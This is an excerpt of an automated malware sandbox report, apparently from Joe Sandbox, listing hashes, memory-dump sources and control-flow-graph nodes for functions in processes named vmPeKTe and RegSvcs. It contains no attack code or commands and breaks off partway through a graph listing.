                                                          • API String ID: 410705778-0
                                                          • Opcode ID: c58e4ab2b0137073c4095cf18d7be0a70b02e1b8e12561a7dab4ccb1216c2f0b
                                                          • Instruction ID: aefecb6155ab61e808a5da5ce12ecb142d35f348101ec049150e15c70ea13197
                                                          • Opcode Fuzzy Hash: c58e4ab2b0137073c4095cf18d7be0a70b02e1b8e12561a7dab4ccb1216c2f0b
                                                          • Instruction Fuzzy Hash: 3511F5B5800349DFDB10DF9AD445BDEBBF8EB48310F108459E914A7200D375AA44CFA5
                                                          Function 00A8D3B4 Relevance: .1, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1482019673.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_a8d000_vmPeKTe.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ca3d2ef6d03294b5a18bf9ab4e2b8a5c55902529f6dece2c9c340c7f4aba0a84
                                                          • Instruction ID: 70ba56dc9595d70c6589e6c05dfb99261dc875513560b46f4f6595eab6262603
                                                          • Opcode Fuzzy Hash: ca3d2ef6d03294b5a18bf9ab4e2b8a5c55902529f6dece2c9c340c7f4aba0a84
                                                          • Instruction Fuzzy Hash: D121F5B2504244EFDB15EF14D9C0F26BF75FB94314F24C569E8090B696C336E856CBA2
                                                          Function 00A9D01C Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1482183974.0000000000A9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A9D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_a9d000_vmPeKTe.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 64d4a16761288b974e06c6a7cf9cbd3ba1b86bfb8ef26077e1eb9a8efad2db68
                                                          • Instruction ID: 065385d1385313d3d8f63f837347531b99e2cb1ce87f46c24f82847df1587388
                                                          • Opcode Fuzzy Hash: 64d4a16761288b974e06c6a7cf9cbd3ba1b86bfb8ef26077e1eb9a8efad2db68
                                                          • Instruction Fuzzy Hash: C921F271604344EFDF14DF24D984B26BBA5FB84314F24C569E84A4B286C33AD887CA62
                                                          Function 00A9D1D4 Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1482183974.0000000000A9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A9D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_a9d000_vmPeKTe.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c08555e285403cfaebe0761156cd50c2564e3171b10d65e5c00917c1ce81144f
                                                          • Instruction ID: 9125175d04229fc2c8f4855cc13d7eb4586dea00a4590473983378a2a8c99800
                                                          • Opcode Fuzzy Hash: c08555e285403cfaebe0761156cd50c2564e3171b10d65e5c00917c1ce81144f
                                                          • Instruction Fuzzy Hash: 302104B5604304EFDF05DF64D9C0B26BBA5FB84314F24C6ADE8094F296C336D886CA62
                                                          Function 00A9D006 Relevance: .1, Instructions: 60COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1482183974.0000000000A9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A9D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_a9d000_vmPeKTe.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 21acb93e24e15a95e07091f200764ee86239bc43e4c5c452174949b9e00a6e59
                                                          • Instruction ID: 7856a85382edfb58e0e4793ae879487915e891e17b46d7d90805c60b6ab588b4
                                                          • Opcode Fuzzy Hash: 21acb93e24e15a95e07091f200764ee86239bc43e4c5c452174949b9e00a6e59
                                                          • Instruction Fuzzy Hash: 052192755093809FDB02CF20D990715BFB1EB45314F28C5DAD8498B697C33AD84ACB62
                                                          Function 00A8D3AF Relevance: .1, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1482019673.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_a8d000_vmPeKTe.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0d1964494f132f00775c0e221f472ab769a33717f3edcd57285c8181465a4d2f
                                                          • Instruction ID: 903ca1fc6f0ee47f4451001f48f5dd123e2eb21a32b868ae2b03f61be94de410
                                                          • Opcode Fuzzy Hash: 0d1964494f132f00775c0e221f472ab769a33717f3edcd57285c8181465a4d2f
                                                          • Instruction Fuzzy Hash: 1811D376504280DFCB15DF10D9C4B16BF71FB94314F24C5A9D8490B656C336E856CBA2
                                                          Function 00A9D1CF Relevance: .1, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1482183974.0000000000A9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A9D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_a9d000_vmPeKTe.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a6f14a2633b0976cf55fba98dc8f49a251bcab79b87bdac7509de7911a20ab2c
                                                          • Instruction ID: d95557b923fcb8ca72995d58b9b032197e23c5096ada7e801de8c4897e7dbc1c
                                                          • Opcode Fuzzy Hash: a6f14a2633b0976cf55fba98dc8f49a251bcab79b87bdac7509de7911a20ab2c
                                                          • Instruction Fuzzy Hash: 0F118B75A04280DFCB15CF10D5C4B55FBA1FB84314F24C6A9D8494F696C33AD88ACB62
                                                          Function 00A8D745 Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1482019673.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_a8d000_vmPeKTe.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4df09c1dfdd175844a45d1000d7e3e51e6c512533761bfd41cb78f1030019b3f
                                                          • Instruction ID: e46ee9c4625316159d8dec41b7c8debd2b07495be278a65ff24bfbce28098f86
                                                          • Opcode Fuzzy Hash: 4df09c1dfdd175844a45d1000d7e3e51e6c512533761bfd41cb78f1030019b3f
                                                          • Instruction Fuzzy Hash: 27012671004344ABE7206F65DC84B67FBE8EF81764F18C55AED080E2C2D3399800CBB2
                                                          Function 00A8D744 Relevance: .0, Instructions: 36COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1482019673.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_a8d000_vmPeKTe.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a566ea9423a175d262e87e4f92cb59515f56778ef6016a987ecc661ff38c9551
                                                          • Instruction ID: 1bc7c33e7bcc1e16c787291a11df4c76e90a0f2d5e55e677ba76c8e04273d2ca
                                                          • Opcode Fuzzy Hash: a566ea9423a175d262e87e4f92cb59515f56778ef6016a987ecc661ff38c9551
                                                          • Instruction Fuzzy Hash: B5F06D71405344AEE7109F16DC88BA6FFD8EB91734F18C45AED084E286C2799844CBB1

                                                          Execution Graph

                                                          Execution Coverage:11.2%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:17
                                                          Total number of Limit Nodes:4
                                                          execution_graph 24417 2b70848 24419 2b7084e 24417->24419 24418 2b7091b 24419->24418 24421 2b7138f 24419->24421 24423 2b71393 24421->24423 24422 2b714a0 24422->24419 24423->24422 24425 2b77fa0 24423->24425 24426 2b77faa 24425->24426 24429 2b77fc4 24426->24429 24430 66bfadf 24426->24430 24434 66bfaf0 24426->24434 24429->24423 24432 66bfb05 24430->24432 24431 66bfd1a 24431->24429 24432->24431 24433 66bfd30 GlobalMemoryStatusEx 24432->24433 24433->24432 24436 66bfb05 24434->24436 24435 66bfd1a 24435->24429 24436->24435 24437 66bfd30 GlobalMemoryStatusEx 24436->24437 24437->24436

                                                          Executed Functions

                                                          Function 066B5670 Relevance: 1.8, Strings: 1, Instructions: 599COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 66b5670-66b568d 1 66b568f-66b5692 0->1 2 66b56ae-66b56b1 1->2 3 66b5694-66b56a9 1->3 4 66b56b3-66b56b9 2->4 5 66b56c0-66b56c3 2->5 3->2 9 66b56bb 4->9 10 66b56f3-66b56fd 4->10 6 66b56cd-66b56d0 5->6 7 66b56c5-66b56c8 5->7 11 66b56da-66b56dd 6->11 12 66b56d2-66b56d5 6->12 7->6 9->5 15 66b5704-66b5706 10->15 13 66b56df-66b56e3 11->13 14 66b56ee-66b56f1 11->14 12->11 16 66b583a-66b5847 13->16 17 66b56e9 13->17 14->10 18 66b570b-66b570e 14->18 15->18 17->14 19 66b5732-66b5735 18->19 20 66b5710-66b572d 18->20 21 66b5749-66b574c 19->21 22 66b5737-66b5744 19->22 20->19 23 66b5769-66b576c 21->23 24 66b574e-66b5764 21->24 22->21 27 66b5778-66b577b 23->27 28 66b576e-66b5777 23->28 24->23 29 66b577d-66b577e 27->29 30 66b5783-66b5786 27->30 29->30 33 66b5799-66b579c 30->33 34 66b5788-66b578e 30->34 36 66b579e-66b57a4 33->36 37 66b57d4-66b57d7 33->37 34->7 35 66b5794 34->35 35->33 38 66b57aa-66b57b2 36->38 39 66b5848-66b5873 36->39 40 66b57d9-66b57df 37->40 41 66b57e6-66b57e9 37->41 38->39 43 66b57b8-66b57c5 38->43 51 66b587d-66b5880 39->51 40->36 44 66b57e1 40->44 41->4 42 66b57ef-66b57f2 41->42 46 66b57f9-66b57fc 42->46 47 66b57f4-66b57f6 42->47 43->39 48 66b57cb-66b57cf 43->48 44->41 49 66b57fe-66b580d 46->49 50 66b5812-66b5815 46->50 47->46 48->37 49->50 52 66b5823-66b5826 50->52 53 66b5817-66b581e 50->53 54 66b5882-66b588c 51->54 55 66b5891-66b5894 51->55 52->40 57 66b5828-66b582a 52->57 53->52 54->55 58 66b58a8-66b58ab 55->58 59 66b5896-66b589d 55->59 60 66b582c 57->60 61 66b5831-66b5834 57->61 65 66b58ad-66b58b4 58->65 66 66b58b5-66b58b8 58->66 63 66b595a-66b5961 59->63 64 66b58a3 59->64 60->61 61->1 61->16 64->58 67 66b58ba-66b58cb 66->67 68 66b58d0-66b58d3 66->68 67->68 69 66b58f1-66b58f4 68->69 70 66b58d5-66b58d9 68->70 73 66b590e-66b5911 69->73 74 66b58f6-66b58fa 69->74 71 66b58df-66b58e7 70->71 72 66b5962-66b5970 70->72 71->72 76 66b58e9-66b58ec 71->76 87 66b599b-66b599d 72->87 88 66b5972-66b599a 72->88 78 66b592b-66b592e 73->78 79 66b5913-66b5917 73->79 74->72 77 66b58fc-66b5904 74->77 76->69 77->72 81 66b5906-66b5909 77->81 83 66b5948-66b594a 78->83 84 66b5930-66b5934 78->84 79->72 82 66b5919-66b5921 79->82 81->73 82->72 89 66b5923-66b5926 82->89 85 66b594c 83->85 86 66b5951-66b5954 83->86 84->72 90 66b5936-66b593e 84->90 85->86 86->51 86->63 91 66b599e-66b59a1 87->91 88->87 89->78 90->72 92 66b5940-66b5943 90->92 93 66b59bf-66b59c2 91->93 94 66b59a3-66b59b4 91->94 92->83 95 66b5cab-66b5cae 93->95 96 66b59c8-66b5b5c 93->96 101 66b59ba 94->101 102 66b5d1d-66b5d30 94->102 98 66b5cbc-66b5cbf 95->98 99 66b5cb0-66b5cb7 95->99 151 66b5b62-66b5b69 96->151 152 66b5c95-66b5ca8 96->152 103 66b5cdd-66b5ce0 98->103 104 66b5cc1-66b5cd2 98->104 99->98 101->93 105 66b5cea-66b5ced 103->105 106 66b5ce2-66b5ce7 103->106 112 66b5d6b-66b5d7c 104->112 113 66b5cd8 104->113 108 66b5cef-66b5d00 105->108 109 66b5d07-66b5d0a 105->109 106->105 108->99 119 66b5d02 108->119 114 66b5d18-66b5d1b 109->114 115 66b5d0c-66b5d13 109->115 112->99 124 66b5d82 112->124 113->103 114->102 118 66b5d33-66b5d36 114->118 115->114 118->96 121 66b5d3c-66b5d3f 118->121 119->109 121->96 122 66b5d45-66b5d48 121->122 125 66b5d4a-66b5d5b 122->125 126 66b5d66-66b5d69 122->126 127 66b5d87-66b5d89 124->127 125->99 133 66b5d61 125->133 126->112 126->127 129 66b5d8b 127->129 130 66b5d90-66b5d93 127->130 129->130 130->91 132 66b5d99-66b5da2 130->132 133->126 153 66b5b6f-66b5b92 151->153 154 66b5c1d-66b5c24 151->154 163 66b5b9a-66b5ba2 153->163 154->152 155 66b5c26-66b5c59 154->155 167 66b5c5b 155->167 168 66b5c5e-66b5c8b 155->168 164 66b5ba7-66b5be8 163->164 165 66b5ba4 163->165 176 66b5bea-66b5bfb 164->176 177 66b5c00-66b5c11 164->177 165->164 167->168 168->132 176->132 177->132
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3884657682.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_66b0000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $
                                                          • API String ID: 0-3993045852
                                                          • Opcode ID: f34fbf7731dae908841bd403b7a4b7f6a5d1a4534c02d151284db0f0f7d2c57f
                                                          • Instruction ID: 247b62680eaaf7044d79c538720ef25fc484086ce200af49bb122dc1afdfa7c8
                                                          • Opcode Fuzzy Hash: f34fbf7731dae908841bd403b7a4b7f6a5d1a4534c02d151284db0f0f7d2c57f
                                                          • Instruction Fuzzy Hash: AD22AD71F00215DFDB64DFA4D4806EEBBB2EB85320F20856AD456AB394DB35EC81CB90
                                                          Function 066B2429 Relevance: 1.0, Instructions: 1017COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3884657682.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_66b0000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 88a37808875d33f43418e01c1e084a9a5a25c691a0ca9eb97c5e29a70e608872
                                                          • Instruction ID: 05d0bd3f17c37d8f87388102c6d81ac4decf3828adfedc8e9e84d2c52ccf6111
                                                          • Opcode Fuzzy Hash: 88a37808875d33f43418e01c1e084a9a5a25c691a0ca9eb97c5e29a70e608872
                                                          • Instruction Fuzzy Hash: 2D926630E00204CFDBA4DB68C598AADB7F6FB49314F5484AAD409AB365DB35ED85CF90
                                                          Function 066B66C0 Relevance: .8, Instructions: 818COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3884657682.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_66b0000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a65ae8dd21341b404311e77712d9fe9621bddda4f466abb4371d25ad066946c1
                                                          • Instruction ID: 198784bd5139915ce559e09f0c5bd78b9accb5432d3ff35defdf8e58d4f245be
                                                          • Opcode Fuzzy Hash: a65ae8dd21341b404311e77712d9fe9621bddda4f466abb4371d25ad066946c1
                                                          • Instruction Fuzzy Hash: 9C626A34A00209DFDB54DB68D994AEDB7F2EF88314F149469D406EB394DB35ED82CB90
                                                          Function 066BC238 Relevance: .6, Instructions: 648COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1282 66bc238-66bc25a 1283 66bc25c-66bc25f 1282->1283 1284 66bc279-66bc27c 1283->1284 1285 66bc261-66bc267 1283->1285 1288 66bc27e-66bc298 1284->1288 1289 66bc29d-66bc2a0 1284->1289 1286 66bc5da-66bc60d 1285->1286 1287 66bc26d-66bc274 1285->1287 1297 66bc60f-66bc612 1286->1297 1287->1284 1288->1289 1290 66bc2af-66bc2b2 1289->1290 1291 66bc2a2-66bc2a8 1289->1291 1292 66bc2ce-66bc2d1 1290->1292 1293 66bc2b4-66bc2c3 1290->1293 1291->1285 1296 66bc2aa 1291->1296 1298 66bc2d9-66bc2dc 1292->1298 1299 66bc2d3-66bc2d4 1292->1299 1305 66bc2c9 1293->1305 1306 66bc557-66bc55a 1293->1306 1296->1290 1301 66bc632-66bc635 1297->1301 1302 66bc614-66bc62d 1297->1302 1303 66bc2e2-66bc2e5 1298->1303 1304 66bc516-66bc51f 1298->1304 1299->1298 1307 66bc65d-66bc660 1301->1307 1308 66bc637-66bc650 1301->1308 1302->1301 1309 66bc311-66bc314 1303->1309 1310 66bc2e7-66bc30c 1303->1310 1311 66bc525 1304->1311 1312 66bc434-66bc43d 1304->1312 1305->1292 1315 66bc55f-66bc562 1306->1315 1319 66bc683-66bc686 1307->1319 1320 66bc662-66bc67e 1307->1320 1361 66bc6bf-66bc6cb 1308->1361 1369 66bc652-66bc65c 1308->1369 1313 66bc316-66bc330 1309->1313 1314 66bc335-66bc338 1309->1314 1310->1309 1318 66bc52a-66bc52d 1311->1318 1312->1286 1317 66bc443-66bc44a 1312->1317 1313->1314 1321 66bc33a-66bc353 1314->1321 1322 66bc358-66bc35b 1314->1322 1323 66bc585-66bc588 1315->1323 1324 66bc564-66bc580 1315->1324 1329 66bc44f-66bc452 1317->1329 1330 66bc52f-66bc532 1318->1330 1331 66bc537-66bc53a 1318->1331 1325 66bc688-66bc692 1319->1325 1326 66bc693-66bc696 1319->1326 1320->1319 1321->1322 1336 66bc35d-66bc37f 1322->1336 1337 66bc384-66bc387 1322->1337 1343 66bc58a-66bc5ae 1323->1343 1344 66bc5b3-66bc5b6 1323->1344 1324->1323 1334 66bc698-66bc6a6 1326->1334 1335 66bc6ad-66bc6af 1326->1335 1338 66bc469-66bc46c 1329->1338 1339 66bc454-66bc464 1329->1339 1330->1331 1340 66bc53c-66bc54d 1331->1340 1341 66bc552-66bc555 1331->1341 1334->1308 1373 66bc6a8 1334->1373 1348 66bc6b1 1335->1348 1349 66bc6b6-66bc6b9 1335->1349 1336->1337 1337->1291 1350 66bc38d-66bc390 1337->1350 1351 66bc47e-66bc481 1338->1351 1352 66bc46e-66bc479 1338->1352 1339->1338 1340->1341 1341->1306 1341->1315 1343->1344 1345 66bc5b8-66bc5ba 1344->1345 1346 66bc5bd-66bc5bf 1344->1346 1345->1346 1357 66bc5c1 1346->1357 1358 66bc5c6-66bc5c9 1346->1358 1348->1349 1349->1297 1349->1361 1364 66bc392-66bc3fb 1350->1364 1365 66bc400-66bc403 1350->1365 1366 66bc4ac-66bc4af 1351->1366 1367 66bc483-66bc4a7 1351->1367 1352->1351 1357->1358 1358->1283 1372 66bc5cf-66bc5d9 1358->1372 1374 66bc86a-66bc874 1361->1374 1375 66bc6d1-66bc6da 1361->1375 1364->1365 1370 66bc42f-66bc432 1365->1370 1371 66bc405-66bc42a 1365->1371 1378 66bc4bc-66bc4bf 1366->1378 1379 66bc4b1-66bc4b7 1366->1379 1367->1366 1370->1312 1370->1329 1371->1370 1373->1335 1382 66bc6e0-66bc6ff 1375->1382 1383 66bc875-66bc8ae 1375->1383 1386 66bc4cc-66bc4cf 1378->1386 1387 66bc4c1-66bc4c7 1378->1387 1379->1378 1414 66bc858-66bc864 1382->1414 1415 66bc705-66bc70e 1382->1415 1402 66bc8b0-66bc8b3 1383->1402 1389 66bc4d1-66bc4d5 1386->1389 1390 66bc4e0-66bc4e3 1386->1390 1387->1386 1389->1299 1393 66bc4db 1389->1393 1394 66bc4e5-66bc4ff 1390->1394 1395 66bc504-66bc507 1390->1395 1393->1390 1394->1395 1403 66bc509-66bc50e 1395->1403 1404 66bc511-66bc514 1395->1404 1406 66bc8b9-66bc8c7 1402->1406 1407 66bca6f-66bca72 1402->1407 1403->1404 1404->1304 1404->1318 1416 66bc8ce-66bc8d0 1406->1416 1412 66bca95-66bca97 1407->1412 1413 66bca74-66bca90 1407->1413 1417 66bca99 1412->1417 1418 66bca9e-66bcaa1 1412->1418 1413->1412 1414->1374 1414->1375 1415->1383 1419 66bc714-66bc743 call 66b6670 1415->1419 1422 66bc8d2-66bc8d5 1416->1422 1423 66bc8e7-66bc911 1416->1423 1417->1418 1418->1402 1424 66bcaa7-66bcab0 1418->1424 1439 66bc785-66bc79b 1419->1439 1440 66bc745-66bc77d 1419->1440 1422->1424 1433 66bc917-66bc920 1423->1433 1434 66bca64-66bca6e 1423->1434 1437 66bca3d-66bca62 1433->1437 1438 66bc926-66bca35 call 66b6670 1433->1438 1437->1424 1438->1433 1489 66bca3b 1438->1489 1445 66bc7b9-66bc7cf 1439->1445 1446 66bc79d-66bc7b1 1439->1446 1440->1439 1454 66bc7ed-66bc800 1445->1454 1455 66bc7d1-66bc7e5 1445->1455 1446->1445 1461 66bc80e 1454->1461 1462 66bc802-66bc80c 1454->1462 1455->1454 1463 66bc813-66bc815 1461->1463 1462->1463 1465 66bc817-66bc81c 1463->1465 1466 66bc846-66bc852 1463->1466 1467 66bc82a 1465->1467 1468 66bc81e-66bc828 1465->1468 1466->1414 1466->1415 1470 66bc82f-66bc831 1467->1470 1468->1470 1470->1466 1471 66bc833-66bc83f 1470->1471 1471->1466 1489->1434
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3884657682.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_66b0000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 17290c34f321d19b9d90ebff7f70f34b244748ed2afbbc4ad36a65c446946cdb
                                                          • Instruction ID: 6d99b0678f1fef5523cbdf595abca3a07c57e219cd6cc4e89ccb3aa6c0e3cd5e
                                                          • Opcode Fuzzy Hash: 17290c34f321d19b9d90ebff7f70f34b244748ed2afbbc4ad36a65c446946cdb
                                                          • Instruction Fuzzy Hash: 54326C30B10209DFDB54DB68D990BEEB7B2FB88314F10952AE505EB355DB31ED828B91
                                                          Function 066BB2E8 Relevance: .6, Instructions: 587COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3884657682.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_66b0000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6f7d025cbf87bd10f160a3ea84cf274ab9739d23ae77f5b486ab737e97c7474b
                                                          • Instruction ID: 66f35761b6ba56849939a6d3b893ef953da067aca2ecf607a7a21f9a002182f5
                                                          • Opcode Fuzzy Hash: 6f7d025cbf87bd10f160a3ea84cf274ab9739d23ae77f5b486ab737e97c7474b
                                                          • Instruction Fuzzy Hash: 28226C30E10209DFEF64DBA8D590BEEB7A2EB85310F649426E405EB395DF35DC818B51
                                                          Function 066B3138 Relevance: .5, Instructions: 545COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2286 66b3138-66b3159 2287 66b315b-66b315e 2286->2287 2288 66b3160-66b317f 2287->2288 2289 66b3184-66b3187 2287->2289 2288->2289 2290 66b3928-66b392a 2289->2290 2291 66b318d-66b31ac 2289->2291 2293 66b392c 2290->2293 2294 66b3931-66b3934 2290->2294 2299 66b31ae-66b31b1 2291->2299 2300 66b31c5-66b31cf 2291->2300 2293->2294 2294->2287 2296 66b393a-66b3943 2294->2296 2299->2300 2301 66b31b3-66b31c3 2299->2301 2303 66b31d5-66b31e4 2300->2303 2301->2303 2412 66b31e6 call 66b3958 2303->2412 2413 66b31e6 call 66b3951 2303->2413 2305 66b31eb-66b31f0 2306 66b31fd-66b34da 2305->2306 2307 66b31f2-66b31f8 2305->2307 2328 66b391a-66b3927 2306->2328 2329 66b34e0-66b358f 2306->2329 2307->2296 2338 66b35b8 2329->2338 2339 66b3591-66b35b6 2329->2339 2341 66b35c1-66b35d4 2338->2341 2339->2341 2343 66b35da-66b35fc 2341->2343 2344 66b3901-66b390d 2341->2344 2343->2344 2347 66b3602-66b360c 2343->2347 2344->2329 2345 66b3913 2344->2345 2345->2328 2347->2344 2348 66b3612-66b361d 2347->2348 2348->2344 2349 66b3623-66b36f9 2348->2349 2361 66b36fb-66b36fd 2349->2361 2362 66b3707-66b3737 2349->2362 2361->2362 2366 66b3739-66b373b 2362->2366 2367 66b3745-66b3751 2362->2367 2366->2367 2368 66b3753-66b3757 2367->2368 2369 66b37b1-66b37b5 2367->2369 2368->2369 2372 66b3759-66b3783 2368->2372 2370 66b37bb-66b37f7 2369->2370 2371 66b38f2-66b38fb 2369->2371 2382 66b37f9-66b37fb 2370->2382 2383 66b3805-66b3813 2370->2383 2371->2344 2371->2349 2379 66b3791-66b37ae 2372->2379 2380 66b3785-66b3787 2372->2380 2379->2369 2380->2379 2382->2383 2386 66b382a-66b3835 2383->2386 2387 66b3815-66b3820 2383->2387 2391 66b384d-66b385e 2386->2391 2392 66b3837-66b383d 2386->2392 2387->2386 2390 66b3822 2387->2390 2390->2386 2396 66b3860-66b3866 2391->2396 2397 66b3876-66b3882 2391->2397 2393 66b383f 2392->2393 2394 66b3841-66b3843 2392->2394 2393->2391 2394->2391 2398 66b386a-66b386c 2396->2398 2399 66b3868 2396->2399 2401 66b389a-66b38eb 2397->2401 2402 66b3884-66b388a 2397->2402 2398->2397 2399->2397 2401->2371 2403 66b388e-66b3890 2402->2403 2404 66b388c 2402->2404 2403->2401 2404->2401 2412->2305 2413->2305
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3884657682.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_66b0000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2aa021318147e96ecd0a9448a8140dad43fba0f143e9eab2355e4dbf8845f5c8
                                                          • Instruction ID: 069f60d11568bc9e6529895d7e8fec9e1458de4b61677f7eafda45493f86c4d0
                                                          • Opcode Fuzzy Hash: 2aa021318147e96ecd0a9448a8140dad43fba0f143e9eab2355e4dbf8845f5c8
                                                          • Instruction Fuzzy Hash: DC321E30E1061ACFDB14EF65C85069DB7B2FFC9300F1496AAD449AB314EB71A985CB80
                                                          Function 066B7E48 Relevance: .5, Instructions: 476COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2414 66b7e48-66b7e66 2415 66b7e68-66b7e6b 2414->2415 2416 66b7e6d-66b7e87 2415->2416 2417 66b7e8c-66b7e8f 2415->2417 2416->2417 2418 66b7eb2-66b7eb5 2417->2418 2419 66b7e91-66b7ead 2417->2419 2420 66b7ecc-66b7ecf 2418->2420 2421 66b7eb7-66b7ec5 2418->2421 2419->2418 2424 66b7edc-66b7ede 2420->2424 2425 66b7ed1-66b7edb 2420->2425 2430 66b7eee-66b7f04 2421->2430 2432 66b7ec7 2421->2432 2426 66b7ee0 2424->2426 2427 66b7ee5-66b7ee8 2424->2427 2426->2427 2427->2415 2427->2430 2434 66b7f0a-66b7f13 2430->2434 2435 66b811f-66b8129 2430->2435 2432->2420 2436 66b812a-66b815f 2434->2436 2437 66b7f19-66b7f36 2434->2437 2440 66b8161-66b8164 2436->2440 2446 66b810c-66b8119 2437->2446 2447 66b7f3c-66b7f64 2437->2447 2442 66b816a-66b8176 2440->2442 2443 66b8217-66b821a 2440->2443 2448 66b8181-66b8183 2442->2448 2444 66b8220-66b822f 2443->2444 2445 66b8446-66b8449 2443->2445 2462 66b824e-66b8289 2444->2462 2463 66b8231-66b824c 2444->2463 2449 66b844b-66b8467 2445->2449 2450 66b846c-66b846e 2445->2450 2446->2434 2446->2435 2447->2446 2467 66b7f6a-66b7f73 2447->2467 2451 66b819b-66b81a2 2448->2451 2452 66b8185-66b818b 2448->2452 2449->2450 2453 66b8470 2450->2453 2454 66b8475-66b8478 2450->2454 2460 66b81b3 2451->2460 2461 66b81a4-66b81b1 2451->2461 2457 66b818f-66b8191 2452->2457 2458 66b818d 2452->2458 2453->2454 2454->2440 2459 66b847e-66b8487 2454->2459 2457->2451 2458->2451 2465 66b81b8-66b81ba 2460->2465 2461->2465 2473 66b841a-66b8430 2462->2473 2474 66b828f-66b82a0 2462->2474 2463->2462 2468 66b81bc-66b81bf 2465->2468 2469 66b81d1-66b820a 